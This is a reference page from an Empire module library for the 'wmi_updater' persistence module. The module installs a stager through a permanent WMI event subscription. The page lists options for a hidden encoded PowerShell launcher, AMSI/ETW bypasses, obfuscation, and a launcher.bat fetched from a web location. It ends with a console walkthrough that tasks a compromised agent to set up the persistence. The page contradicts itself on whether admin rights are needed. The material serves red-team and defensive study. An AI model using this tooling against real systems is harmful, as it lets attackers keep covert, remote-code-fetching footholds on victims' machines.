Invoke-WMI - Empire Module
This page contains detailed information about how to use the powershell/persistence/elevated/wmi_updater Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-WMI
Module: powershell/persistence/elevated/wmi_updater
Source code [1]: empire/server/modules/powershell/persistence/elevated/wmi_updater.yaml
Source code [2]: empire/server/modules/powershell/persistence/elevated/wmi_updater.py
MITRE ATT&CK:
T1084
Language: PowerShell
Needs admin: Yes
OPSEC safe: No
Background: No
The wmi_updater module persists a stager (or script) using a permanent WMI subscription. This has a difficult detection/removal rating.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the wmi_updater module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the wmi_updater module:
Agent
Agent to run module on.
Launcher
Launcher string.
Default value: powershell -noP -sta -w 1 -enc
.
SubName
Name to use for the event subscription.
Default value: AutoUpdater
.
WebFile
The location of the launcher.bat file to fetch over the network/web.
Default value: http://127.0.0.1/launcher.bat
.
Additional Module Options
This is a list of additional options that are supported by the wmi_updater module:
AtStartup
Switch. Trigger script (within 5 minutes) of system startup.
Default value: True
.
Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw
.
Cleanup
Switch. Cleanup the trigger and any script from specified location.
DailyTime
Daily time to trigger the script (HH:mm).
ExtFile
Use an external file for the payload instead of a stager.
Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False
.
ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1
.
Wmi_updater Example Usage
Here's an example of how to use the wmi_updater module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/elevated/wmi_updater
Author @mattifestation
@harmj0y
@tristandostaler
Background False
Comments https://github.com/mattifestation/PowerSploit/blob/master/Persistence/
Persistence.psm1
Description Persist a stager (or script) using a permanent WMI subscription. This
has a difficult detection/removal rating.
Language powershell
Name powershell/persistence/elevated/wmi_updater
NeedsAdmin True
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1084
,Record Options----,--------------------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------------|--------------------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------------|--------------------------------|----------|-------------------------------------|
| AtStartup | True | False | Switch. Trigger script (within 5 |
| | | | minutes) of system startup. |
|------------------|--------------------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------------|--------------------------------|----------|-------------------------------------|
| Cleanup | | False | Switch. Cleanup the trigger and any |
| | | | script from specified location. |
|------------------|--------------------------------|----------|-------------------------------------|
| DailyTime | | False | Daily time to trigger the script |
| | | | (HH:mm). |
|------------------|--------------------------------|----------|-------------------------------------|
| ExtFile | | False | Use an external file for the |
| | | | payload instead of a stager. |
|------------------|--------------------------------|----------|-------------------------------------|
| Launcher | powershell -noP -sta -w 1 -enc | True | Launcher string. |
|------------------|--------------------------------|----------|-------------------------------------|
| Obfuscate | False | False | Switch. Obfuscate the launcher |
| | | | powershell code, uses the |
| | | | ObfuscateCommand for obfuscation |
| | | | types. For powershell only. |
|------------------|--------------------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False | The Invoke-Obfuscation command to |
| | | | use. Only used if Obfuscate switch |
| | | | is True. For powershell only. |
|------------------|--------------------------------|----------|-------------------------------------|
| SubName | AutoUpdater | True | Name to use for the event |
| | | | subscription. |
|------------------|--------------------------------|----------|-------------------------------------|
| WebFile | http://127.0.0.1/launcher.bat | True | The location of the launcher.bat |
| | | | file to fetch over the network/web |
'------------------'--------------------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set Launcher powershell
[*] Set Launcher to powershell
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set SubName AutoUpdater
[*] Set SubName to AutoUpdater
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set WebFile http://127.0.0.1/launcher.bat
[*] Set WebFile to http://127.0.0.1/launcher.bat
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/elevated/wmi_updater.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/elevated/wmi_updater.py
- https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1
- http://127.0.0.1/launcher.bat
- http://attack.mitre.org/techniques/T1084
See Also
Check also the following modules related to this module:
- powershell/persistence/elevated/schtasks
- powershell/persistence/elevated/registry
- powershell/persistence/elevated/wmi
- powershell/persistence/elevated/rid_hijack
- powershell/lateral_movement/invoke_wmi
- powershell/lateral_movement/invoke_wmi_debugger
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.